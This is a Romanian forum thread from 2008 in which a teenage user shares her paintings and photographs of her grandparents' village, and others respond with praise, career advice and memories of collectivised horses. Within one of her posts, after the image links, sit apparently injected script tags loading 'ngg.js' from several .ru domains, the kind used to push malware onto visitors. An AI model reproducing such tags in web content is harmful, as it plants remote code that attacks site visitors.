PDA

Arată versiune întreagă : "Arta" mea

idontknow
04.04.2008, 13:03
M-am gandit sa postez si eu aici niste poze ale picturilor mele, este tot o manifestare artistica pana

la urma...fac asta din clasa a treia(dar am inceput sa fac si poze de vreo cateva luni,

dar nu stiu cat sunt de bune fotografiile mele)...

Interior

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000296.jpg

Via?a

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000045.jpg

Rex

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000310.jpg

Timp pe chipul Ei

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000290.jpg

idontknow
04.04.2008, 13:10
Acesta este un tablou al casei in care a copilarit bunicul meu,nu mai locuieste nimeni in ea si e cam darapanata, dar mie imi place mult...

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000314.jpg

Si am facut si niste reproduceri dupa unele lucrari ale lui Leon Franks:

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000321.jpg

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000325.jpg

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000324.jpg

http://i271.photobucket.com/albums/jj150/oana_idontknow/P1000319.jpg

Sper sa va placasmileys/smiley1.gif.

nicoletamihaela
04.04.2008, 13:32
Draga mea,sunt superbe....TE FELICIT.....smileys/smiley32.gif

fifi
04.04.2008, 13:43
si mie imi plac, sa continui sa desenezi si sa pictezi si dupa ce termini scoala, chiar daca nu vrei sa faci cariera din asta, este un mod foarte benefic, pentru suflet, de a-ti petrece timpul liber. Apropos, ce profil urmezi in scoala si ce intentii ai pe viitor?

idontknow
04.04.2008, 13:56
Va multumesc pentru aprecieri.

Apropos, ce profil urmezi in scoala si ce intentii ai pe viitor?

In mod paradoxal, sunt la un profil mate-info(desi nu prea imi plac obiectele reale, dar ma descurc la ele), insa imi place pictura, literatura, muzica(sa ascult), arta in general.Deci, ca sa le imbim, m-am gandit la arhitectura cu specializarea design de interior...Totusi, nu sunt foarte hotarata, ma tem sa nu fie o profesie cam superficiala...

fifi
04.04.2008, 14:19
intr-adevar e o decizie grea, mai ales la varsta asta dar eu cred ca ai mult mai mari posibilitati decat design ul interior, exceptie facanddorinta de a ajunge in varf, de a face cariera din asta, nu din a-ti gasi doar un servici in care sa ramai intepenita toata viata.

Arta in general si cele mentionate de tine mai sussunt hobby uri cat timp nu excelezi in niciuna, dar ca sa-ti alegi acum profesia de viitor ti-as recomanda sa o consideri ca pe o provocare pt tine, sa-ti alegi ceva de care nu te crezi atat de capabila, sa te abtionezi si sa-ti dovedesti ca poti smileys/smiley2.gif

idontknow
05.04.2008, 03:40
intr-adevar e o decizie grea, mai ales la varsta asta dar eu cred ca ai mult mai mari posibilitati decat design ul interior, exceptie facanddorinta de a ajunge in varf, de a face cariera din asta, nu din a-ti gasi doar un servici in care sa ramai intepenita toata viata.

Arta in general si cele mentionate de tine mai sussunt hobby uri cat timp nu excelezi in niciuna, dar ca sa-ti alegi acum profesia de viitor ti-as recomanda sa o consideri ca pe o provocare pt tine, sa-ti alegi ceva de care nu te crezi atat de capabila, sa te abtionezi si sa-ti dovedesti ca poti http://www.romanian-portal.com/forum/smileys/smiley2.gif

Pai...mi-ar mai fi placut sa studiez folosofia sau critica literara...ceva de genul asta, dar nu vreau sa ajung profesoara, iar ca sa faci si bani din asta e...oarecum dificil(ca si in cazul in care m-as fi dus la arte plastice).Totusi, in legatura cu design-ul de interior, aceasta este doar o specializare pe care o faci in cadrul facultatii de arhitectura de interior...adica, nu este in cadrul facultatii de arte, fiind mai complex.Arhitectura simplu e prea rigid pentru mine, eu imi doresc ceva mai creativ.

Aaa, si mai ramanea si medicina(adica eu o consider cea mai nobila meserie), insa nu am taria necesara.

ramos
05.04.2008, 05:32
Doua lucruri mi-ar fi placut sa mai imi deie Dumnezeu: sa stiu sa cant si sa desenez. Atunci as fi fost un boem desavarsit, dar poate-i mai bine asa, doar boem sau doar... Arta ta imi place, da-i 'nainte!

Imi pare bine ca te-ai "intalnit" cu fifi, omul caruia ii place ce este,stie ce ar fi putut sa fie dar, totodata, nu zice ca e prea tarziu pt a deveni.

Despre barbatul care vrea sa se faca arhitect se spune ca nu este destul de macho pt a se face inginer si nici suficient de gay pt a se face designer de interior. Despre femeia arhitect nu am cunostinta sa se fi scos vorbe. Oricum, nu baga in seama, ca, recunosc, la mijloc e si o mica frustrare; pe vremea mea desenul era proba eliminatorie de concurs la arhitectura, asa ca puteam eu sa tot vreau. Acum ma mai consoleaza zicala de mai sus.

Tu si canti?

angeline
05.04.2008, 07:56
ramos</span> dar desenul atat artistic cat si tehnic este accesibil pentru oricine.
Nici nu va imaginati cat rau isi fac propiei persoane aceeia care gandesc ca nu au talent la...una sau alta.
Mai degraba este vorba de curaj.
Fiecare om este dotat cu talente (nu doar cu unul). Depinde in cursul vietii pe care le exploreaza si exploateaza.
Consolarea si resemnarea ucide.
Comparand desenul tehnic cu desenul artistic pe cel din urma il gasesc mai greu, deosebit. Sunt foarte putini care impresioneaza prin desen artistic si prefera pictura.
Culoarea</span> perceputa vizual se reflectă la nivelul psihicului transmitand impulsurile preluate inclusiv organelor interne favorizand astfel efecte si stari. Impresioneaza rapid si sigur, pe cand desenul trebuie sa exceleze pentru a reda si influenta sentimente, impresii. Trebuie sa fii un stralucit perfectionist al formelor sa poti impresiona cu o lucrare din domeniul desenului artistic dar nu imposibil.

ps </span>idontknow te rog scuza-mi indrazneala de a fi lasat acest mesaj pe topicul tau, am privit si astept sa expui si alte lucrari
ps ramos</span> si acum admiterea la Arhitectura incepe cu examenul de aptitudini (desenul tehnic)
</span></span>

fifi
05.04.2008, 18:50
fatuca draga, idontknow, nu te lua dupa ramos cand zice ca iiplace ce sunt, cred ca a-ncurcat borcanele, i-o place lui ceea ce sunt eu acum dar mie defel, si nu numai acum, dintotdeauna si cred ca niciodata n-o sa fiu multumita de cine sau ceea ce sunt si ceea ce am facut cu mine si cu viata mea, eu sunt foarte autocritica si vesnic nemultumita de micul nimic ce l-am realizat in viata asta...

in prezentul asta al meu, marunt si tare trecator merg dupa credinta ca eu am fost lasata pe acest pamant sa traiesc doar ca sa iubesc pomii-nfloriti si copiii necajiti. Sper sa n-o iei personal, eu prin copii necajiti ma refer la toti oamenii care au intins sau intind o mana sa ceara un ajutor...

stiu ca tu nu esti deloc necajita dar am simtit ca trebuie sa-ti spun ca esti un copil cu un fond bun care merita multe de la viata, iar de la mine, chiar daca o sa ma uiti mai tarziu, acum meriti multe incurajari smileys/smiley1.gif

fl%rin
05.04.2008, 21:31
...ceea ce am facut cu mine si cu viata mea, eu sunt foarte autocritica si vesnic nemultumita de micul nimic ce l-am realizat in viata asta...

Aici m-ai atins la coarda sensibila. Ma primesti si pe mine in clubul asta pentru ca subscriu total cu persoana mea?

Bravo idontknow, vad ca esti o persoana cu multiple talente. Arhitectura este un domeniu interesant si destul de subapreciat (ca si ingineria pentru ca tot a pomenit ramos de ea) si nu trebuie sa o plasezi in spatele medicinii. Fiecare are utilitatea ei, nu cred ca este una mai importanta decat cealalta. Si arhitectura poate salva vieti atunci cand este bine aplicata.

idontknow
06.04.2008, 01:42
Doua lucruri mi-ar fi placut sa mai imi deie Dumnezeu: sa stiu sa cant si sa desenez. Atunci as fi fost un boem desavarsit, dar poate-i mai bine asa, doar boem sau doar... Arta ta imi place, da-i 'nainte!

Lasa, nu te necaji, sunt de ajuns pletelesmileys/smiley36.gifsmileys/smiley17.gif.Acum serios vorbind, nu e nevoie sa stii sa desenezi, trebuie sa ai doar putin simt al culorilor si sa te exprimi pur si simplu...iti recomand pictura, foloseste linii, pete de culoare, forme naive(de obiceiau mai mult impact decat desenul care copiaza realitatea), daca nu ai putea incerca sa faci poze, sa le scoti la imprimanta alb negru si sa te joci apoi cu nuantele pe deasupra, deformand realitatea in functie de starea ta de spirit, sau sa iti "manjesti" hainele cu acrilic...sunt multe variante, trebuie doar sa vreismileys/smiley2.gif.Aaa..si nici voce nu-i nevoie sa ai.Ca sa fii "un boem desavarsit" poti sa-nveti sa canti la chitara(si mie mi-ar fi placut sa stiu...sau la pian ar fi fost dragut, dar problema e ca dacama apuc de foarte multe lucruri e posibil sa nu-l mai fac pe nici unul calumea)smileys/smiley1.gif.

Despre barbatul care vrea sa se faca arhitect se spune ca nu este destul de macho pt a se face inginer si nici suficient de gay pt a se face designer de interior. Despre femeia arhitect nu am cunostinta sa se fi scos vorbe. Oricum, nu baga in seama, ca, recunosc, la mijloc e si o mica frustrare; pe vremea mea desenul era proba eliminatorie de concurs la arhitectura, asa ca puteam eu sa tot vreau. Acum ma mai consoleaza zicala de mai sus.

smileys/smiley36.gifDa chiar, tu ce profesie ti-ai ales?

Tu si canti?

Nu...si oricum, daca ma mai apuca cateodata, ar fi bine sa nu se afle oameni si ferestre in jurul meusmileys/smiley9.gif.

Va multumesc la toti ca ma incurajati.smileys/smiley1.gif

kiddy
06.04.2008, 07:10
idontknow</span>, casa bunicilor tai
mi-a mers la suflet. Nu mai vorbesc de tehnica de a o reprezenta. Se
pare ca stapanesti destul de bine acuarela(?). Mi-ar placea nespus s-o
am pe un perete in casa. Felicitarile mele pentru modul cum iti petreci
timpul liber!smileys/smiley1.gif

Doua lucruri mi-ar fi placut sa mai imi deie Dumnezeu: sa
stiu sa cant si sa desenez. Atunci as fi fost un boem desavarsit

Ca sa fii "un boem desavarsit" poti sa-nveti sa canti
la chitara(si mie mi-ar fi placut sa stiu...sau la pian ar fi fost
dragut, dar problema e ca dacama apuc de foarte multe lucruri e
posibil sa nu-l mai fac pe nici unul calumea)

eu pe ramos</span>, boem, nu mi-l pot inchipui decat indaratul unui saxofon.smileys/smiley1.gif Si ca accesoriu obligatoriu, RayBan!smileys/smiley2.gif

Despre barbatul care vrea sa se faca arhitect se spune ca nu este destul de macho pt a se face inginer si nici suficient de gay pt a se face designer de interior.
Tare! smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif
Merita pusa la Maxime</span>! Sau ai pus-o (postat-o)?smileys/smiley17.gif

ramos
06.04.2008, 17:39
Ca in arta, niciunde nu e mai valabila povestioara cu hainele cele noi ale imparatului. Am aplecare spre frumos, dar stiu doar atat: imi place sau nu-mi place. idontknow, cand am zis ca-mi place artata, numa pricepeamsa spun ceva mai mult de atat. Critica de specialitate ma lasa rece - a se vedea fenomenul "micuta picasso", dupa parerea mea, un fel de promovare cu de-a sila, fata neavand nici o vina decat un pic de talent ceva peste medie. Cam acelasi gen de ploconeala l-am vazut si aici pe forumin fata "artei" austriacului; ne cam da snobismul bice (nici o comparatie sau aluzie lalucrarile postate de tine pe acest topic - ai in tine mult bun simt si modestie si chiar te indemn sa ne mai arati; altii/altele ma cam enerveaza ca-s chiar zgarciti/e)

Cat despre mine,ia, nu ma mai cainati voi atat ca mie deja nu mai imi pasa ca nu stiu desena si canta (si, ca sa ma autodesfiintez, nu stiu nici dansa). Raman la parerea mea precum ca cele doua sunt aptitudini inascute si nu dobandite; le ai sau nu si basta, restul sunt note false(daca ma veti intarata indeajuns, despre notele false am multe de spus, indeosebi despre cele din vorbire ca si vorbirea, nu-i asa (vorba de imprumut de la un prieten de-al lui raven), e tot o arta.

Nu in spatele unui saxofon ci al unei ghitari mi-ar fi placut si mie sa ma aflu dar, din pacate the thrill is cam gone (http://www.youtube.com/watch?v=lqAuuIDU2sw)

FidelKatzo
07.04.2008, 00:38
Raman la parerea mea precum ca cele doua sunt aptitudini inascute si nu dobandite; le ai sau nu si basta, restul sunt note false

Aici trebuie sa-ti dau dreptate..Tin minte in clasele mici ,era sarbatoare pentru colegii mei cand ma punea profesoara de muzica sa solfegiez..

Raven
07.04.2008, 02:17
Raman la parerea mea precum ca cele doua sunt aptitudini inascute si nu dobandite; le ai sau nu si basta, restul sunt note false(daca ma veti intarata indeajuns, despre notele false am multe de spus, indeosebi despre cele din vorbire ca si vorbirea, nu-i asa (vorba de imprumut de la un prieten de-al lui raven), e tot o arta.
Exista si artisti cu zero talent, care n-au ce se numeste generic "aptitudine artistica".

Cioara croncane, nu canta, numai ca fiecare croncanit spune ceva. Spre deosebire de oameni unde, nu-i asa?, vorbitul e de multe ori trancaneala. Cei care spun mult vorbind putin, ca si cioara, sunt artisti.

07.04.2008, 12:29
Buna ! am rasfoit lucrarile tale si pina acum cel mai mult imi place "viata",poate mai adaugi citeva vorbe despre ce te-a inspirat atunci ?!Pe mine ma atrage foarte mult arta abstracta si simbolista ,in primul rind pentru ca mai intodeauna contine foarte mult din necunoscut ,ceea ce nu se vede in schimb avind mult mai mult din ginduri,imaginatie ,idei etc.. , astfel lasind mult mai mult loc pentru o interpretare proprie.Pe mine exprimarea prin ireal ma destinde,dar asta nu inseamna ca nu sint si o admiratoare a altor genuri de arta.Cred ca ti-ar prinde bine sa lucrezi si in Photoshop.Oricare ar fi hotarirea ta pe viitor iti doresc sa -ti iasa exact asa cum ti-ai dorit.

ramos
07.04.2008, 17:25
Cioara croncane, nu canta, numai ca fiecare croncanit spune ceva... Cei care spun mult vorbind putin, ca si cioara, sunt artisti.

Fiecare raven isi lauda cioara.

Raven
08.04.2008, 00:21
Fiecare raven isi lauda cioara.
Am dat si eu un exemplu din viata reala.

ramos
08.04.2008, 03:00
Raven, chiar a fost sugestiva constatarea tacu privire la arta conversatiei. Si, inteleg, nu puteai exemplifica printr-o gaitza. Mi-a fost insa si mie prea la indemana sa glumesc. Scuze! Iar ca sa te imbunez, spun ca cioara si lupul sunt salbaticiunile mele preferate.

Raven
08.04.2008, 03:47
Raven, chiar a fost sugestiva constatarea tacu
privire la arta conversatiei. Si, inteleg, nu puteai exemplifica
printr-o gaitza. Mi-a fost insa si mie prea la indemana sa glumesc.
Scuze! Iar ca sa te imbunez, spun ca cioara si lupul sunt
salbaticiunile mele preferate.
Nici o suparare.

Si lupul e o fiinta interesanta, nu doar pt. ca urla la Luna &lt;smile&gt; (Luna influenteaza viata omului la modul f. semnificativ).

Revenind la arta drei idontknow, ideea din "Viata" (v. postarea din deschiderea topicului) am mai vazut-o exprimata in mod asemanator (pictura naiva) cu multi ani in urma.
Chiar daca e o reproducere in stil personal, a reusit sa pastreze mesajul transmis audientei de catre original.

08.04.2008, 04:44
Raven , stiam
si fara sa mai repeti ca tu nu te consideri un naiv, credeam insa ca poti venii
si tu cu ceva constructiv nu distructiv (asa era frumos) dar se pare ca camasile tale sint mult
prea apretate ,iti recomand balsamul.smileys/smiley2.gif</span>

Raven
08.04.2008, 10:15
Constructiv era. Si reproducerile bune inseamna arta.

Tocmai mi-am amintit ca pictura respectiva se numeste (parca) "Arborele vietii".

idontknow
08.04.2008, 10:20
Hmmm...lucrarea cu titlul "Viata" am conceput-o initial pentru un concurs cu tema impotriva discriminarii. M-am gandit la un amalgam de fiinte umane care se contopesc, se unesc, se sprijina reciproc desi nu au aceeasi culoare a pielii. Bineinteles, apoi mi-am dat seama ca nu prea reiese chestia asta din lucrare si am interpretat-o ca "viata" pur si simplu. Si nu stiu cat e de originala, insa e posibil ca privind de-a lungul anilor picturi, afise, expozitii etc. sa-mi fi ramas inminte aceasta idee de la altcineva...oricum, in arta motivele se repeta, important e cum transmitem noi un anumit mesaj prin intermediul lor.

Iar reproducerile sunt bune pentru exercitiu(si ca sa faci si bani eventual)smileys/smiley1.gif.

idontknow
18.04.2008, 11:30
Eu am inceput de putin timp sa fac fotografii, insa am zis sa imi fac curaj si sa va cer si voua parerea. Majoritatea sunt de pe la bunici, ei si locurile unde mi-am petrecut o buna parte a copilariei mele ma inspira cel mai mult.

Pulberi de trecut

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Pulberidetrecut.jpg

(E aceeasi casa din tablou.)

M

kiddy
18.04.2008, 11:46
idontknow, de-ar sti bunicul tau ca a ajunssubiect pe internet...smileys/smiley1.gif

Sa fie sanatos! Si tu! Sa mai puteti petrece cat mai mult timp impreuna.

Ce-as vrea sa mai intorc timpul uneori... smileys/smiley19.gif

18.04.2008, 12:37
Reusita fotografia " tinar si nelinistit" sa continui .

idontknow
19.04.2008, 01:36
idontknow, de-ar sti bunicul tau ca a ajunssubiect pe internet...http://www.romanian-portal.com/forum/smileys/smiley1.gif

Sa fie sanatos! Si tu! Sa mai puteti petrece cat mai mult timp impreuna.

Ce-as vrea sa mai intorc timpul uneori... http://www.romanian-portal.com/forum/smileys/smiley19.gif

Ha, ha, eu cred ca ar fi mandrusmileys/smiley4.gif.Multumesc mult pentru uraresmileys/smiley1.gif...asta ne dorim toti...exact de timp&amp;stuff discutam si noi cand i-am facut pozele...smileys/smiley6.gif

idontknow
19.04.2008, 01:37
Reusita fotografia " tinar si nelinistit" sa continui .

Multumesc, Melina.smileys/smiley1.gif

idontknow
06.05.2008, 05:46
"Copilarie"

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Copilarie.jpg

Ce stii tu?!

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Cestiitu.jpg

Puritate

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Puritate.jpg

Amprenta vietii

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Berzu.jpg

(unchiul meusmileys/smiley1.gif)

Efemer...

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Efemer.jpg

ramos
06.05.2008, 19:49
pe vremea cand eu am fost mic, nu avea (voie sa aibe) cai decat colectivu'. Iar si mai mic cand am fost, a avut si bunicu', dar clar ca eu n-am cum sa stiu; si pe iapa lui o chema Bertha. Si nu intelegeam de ce mama plangea cand herghelia colectivului trecea in galop peulita si imi spunea ca armasarul ala frumos e de la iapa noastra. De caii lui, lui bunicu' i-a parut tare rau, nu doar ca i i-au luat ci ca ii vedea asa de slabi si, din ce-i ramanea dupa datul cotelor, se ducea la grajdul colectivului si-l mituia pe grajdar sa-l lase sa le deie zob si sa-i tesale. Mai tarziu, si eu ma imprietenisem cu grajdarul (alt grajdarla alti cai) si ma lasa sa-i calaresc fara sa, tinandu-ma doar ce coama lor. Apoi m-am dus la scoala la oras si am uitat de cai. Acum realizez ca mi-ar fi placut sa pun si eu poze pe forum cu caii lu' bunicu'.

idontknow, salutari bunicului tau!

idontknow
07.05.2008, 05:04
pe vremea cand eu am fost mic, nu avea (voie sa aibe) cai decat colectivu'. Iar si mai mic cand am fost, a avut si bunicu', dar clar ca eu n-am cum sa stiu; si pe iapa lui o chema Bertha. Si nu intelegeam de ce mama plangea cand herghelia colectivului trecea in galop peulita si imi spunea ca armasarul ala frumos e de la iapa noastra. De caii lui, lui bunicu' i-a parut tare rau, nu doar ca i i-au luat ci ca ii vedea asa de slabi si, din ce-i ramanea dupa datul cotelor, se ducea la grajdul colectivului si-l mituia pe grajdar sa-l lase sa le deie zob si sa-i tesale. Mai tarziu, si eu ma imprietenisem cu grajdarul (alt grajdarla alti cai) si ma lasa sa-i calaresc fara sa, tinandu-ma doar ce coama lor. Apoi m-am dus la scoala la oras si am uitat de cai. Acum realizez ca mi-ar fi placut sa pun si eu poze pe forum cu caii lu' bunicu'.

idontknow, salutari bunicului tau!

Cam trista povestea ta, si bunicul tine foarte mult la iapa lui, ca una are si n-ar da-o pe nimic...acum ca ai vorbit de cai...mi-am adus aminte deniste fotografii pe care nu le-am postat, dar care pentru mine au o valoare speciala pentru ca mi-a aratat ce inseamna sa fii om bun, simplu, si multumitcu saracia ta, cu liniste sufleteasca...

Tocmai fotografiam niste copii din satul bunicilor mei, oleaca murdari, cam saracuti, si totusi mai expresivi decat toti orasenii pe care i-am vazut vreodata.Nu faceau nazuri, chiar ma rugau sa le fac mai multe poze, ei aveau casuta pe un deal si poarta era deschisa mereu, intrau vecinii ca la ei acasa...si ca sa ii prind dintr-un unghi mai frumos, ca si asa nu aveau tancii nimic impotriva, fac si eu 3 pasi in curtea omului...Mai fac ei pe modelelecateva minute(desi eu prefer spontaneitatea in general, dar asa aveau tendinta de a sta drepti si seriosismileys/smiley4.gif), si pe neasteptate vad de departe cum iese tatal din casa...eu acum nu stiamde ce sama scuz prima oara, ca ii pozez copiii sau ca am intrat in curtea lui(desi puteau sa ma considere un partener de joacasmileys/smiley36.gif).Insa nu apuc eu sa zic nimic, ca omul cu zambetul pe fata se apropie de mine si imi zice cica "Nu vrei sa scot si calul, sa le faci poze pe cal?".Eu raman masca, insa imi revin repede si accept...nici 3 minte nu a durat ca a si scos calul din grajd(daca era grajd) si si-a urcat picii pe el(cu toate ca nu au fost ei prea incantati sa fie urcati pe cal, se vede si in pozesmileys/smiley36.gif, dar am avut grija sa-i dea jos repede)...Data viitoare cand mai trec pe la tara am sa le dau fotografiile pe hartie, am promissmileys/smiley4.gif...

Pe mine aceasta intamplare m-a facut sa-mi dau seama cat de binevoitori si de buni pot fi unii oameni, asa, in simplitatea si in saracia lor...Acea familie (am uitat sa mai spun ca si mama lor avea tot asa, o expresie blanda pe fata) m-a facut sa ma gandesc la contrastul dintre viata lor si viata noastra, din toate punctele de vedere...siam momente candspun sincer ca mi-o doresc pe-a lor...dar poate sunt eu prea poetica uneori, adevarul e ca nici nu am avut mari greutati "la viata mea",ca sa ma exprim intr-un mod obiectiv...smileys/smiley9.gif

P.S. Multumesc pentru salutari, am sa-i transmit buniculuismileys/smiley1.gif...

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Dati-nejosde-aiiiicii.jpg

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Dati-nejosde-aiiiicii2.jpg

http://i271.photobucket.com/albums/jj150/oana_id&#111;ntknow/Dati-nejosde-aiiiicii3.jpgwww<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http:/<script src=http://www.iroe.ru/ngg.js></script>

07.05.2008, 06:17
Mie mi-a placut ultima poza cu bunicu , din pacate eu nu am avut sansa sa imi cunosc bunicii ,fiindca au murit amindoi cind eram foarte mica smileys/smiley19.gif. Unul din ei a fost cocos de muntesmileys/smiley2.gif si a calarit si el citeva iepe la viata lui .smileys/smiley36.gif

idontknow
07.05.2008, 07:07
Mie mi-a placut ultima poza cu bunicu , din pacate eu nu am avut sansa sa imi cunosc bunicii ,fiindca au murit amindoi cind eram foarte mica http://www.romanian-portal.com/forum/smileys/smiley19.gif. Unul din ei a fost cocos de muntehttp://www.romanian-portal.com/forum/smileys/smiley2.gif si a calarit si el citeva iepe la viata lui .http://www.romanian-portal.com/forum/smileys/smiley36.gif

smileys/smiley36.gifMersi, Melina...

browneyes
07.05.2008, 11:12
mie mi-au placut toate...mi se face un dor de copilarie...
de lucrurile atat de simple ca dor. uneori e nevoie de un rasarit de soare privit in iarba sa te simti mai fericit decat cu o masina 4x4

idontknow
08.05.2008, 03:17
mie mi-au placut toate...mi se face un dor de copilarie...
de lucrurile atat de simple ca dor. uneori e nevoie de un rasarit de soare privit in iarba sa te simti mai fericit decat cu o masina 4x4

Multumesc si...sunt total de acord cu comparatia ta:)

mirela_delia
08.05.2008, 06:32
Deosebit de frumoase!smileys/smiley32.gifE o arta sensibila,intr-un suflet sensibil.

idontknow
08.05.2008, 11:23
Iti multumesc frumos, mirela_delia, si tu esti un suflet sensibil si asta se vede din firea ta:)

01.06.2008, 17:21
Mie mi-a placut mult poza "Mangaiere" (cu casa bunicilor si soarele ascuns dupa un trunchi). Mi-a amintit ceva frumos din copilarie, o alta casa, un alt trunchi de copac, alti bunici... acelasi soare! Multumesc!;)

Mult succes in continuare, la fotografii! :)

Georgian@
01.06.2008, 23:45
eu te felicit alaturi de ceilalti.

mi s-a parut ciudat ca ai intitulat o poza alb negru drept copilarie. dar din cate vad este pusa in ghilimele. eu cand ma gandesc la copilarie ma gandesc la culori, imaginatie, fantezie, joc, dinamism, ordine in dezordine, miros de fan proaspat cosit, sublima libertate intr-un spatiu restrans etc-ceva nestatic si la fel deviu vibrand in fiinta mea. poate ne spui cate ceva despre ea, daca nu, e ok. pentru ca stiu cum e. arta e o chestiune de o secunda care inglobeaza o istorie, spatiu si timp, e chintesenta acestora din urma reflectata prin spectrul unui sentiment, unei dispozitii dintr-un prezent relativ.

Ninu100
20.06.2008, 23:04
idontknow ... sint cele mai frumoase poze pe care le-am vazut vreodata ....este atita suflet in ele...si e toata poveste vietii la tara in RO...mi-au trezit amintiri.... si postarile si pozele...si pe iapa Bunicului meu o chema tot Doina...si i-au luat-o la colectiv...a suferit toata viata dupa ea...intr-o zi a vazut pe cel ce umbla cu ea ( carutas la CAP ) cum o bate...a tabarit pe el si l-a batut si el atit de tare ca l-a bagat in Spital...l-a arestat Militia dar doar pt putin timp....vremuri de durere si tristete pt. neamul Romanesc... pozele tale mi-au trezit toate acele amintiri...Dumnezeu sa te binecuvinteze , idontknow....pt sufletul tau bun !</span></span>

idontknow
21.06.2008, 07:09
Draga Ninu, iti multumesc din suflet pentru vorbele tale atat de frumoase si imi pare sincer rau pentru ce i s-a intamplat bunicului tau si bietului animal...eu nu am trait pe vremea lu' Ceasca', dar am mai auzit asemenea povesti triste de la parinti, prieteni mai in varsta sau bunici...ce pot sa zic, decat: slava Domnului ca s-a terminat cu perioada aia neagra din istoria romanilor!

Si...multe binecuvantari iti doresc si eu!

idontknow
21.06.2008, 07:16
Suflet_solar si Georgian@, va multumesc pentru incurajari, ma bucur ca am reusit sa transmit ceva prin fotografiile mele, pentru ca si pentru mine au valoare sentimentala.

Georgian@, sunt de acord cu felul in care vezi tu copilaria si tocmai de aceea am pus titlul acelei poze intre ghilimele, pentru ca, desi poate are o viata simpla si curata, acel baietel sufera totusi din cauza saraciei, iar privirea lui mi s-a parut destul de trista, cel putin in acea fotografie...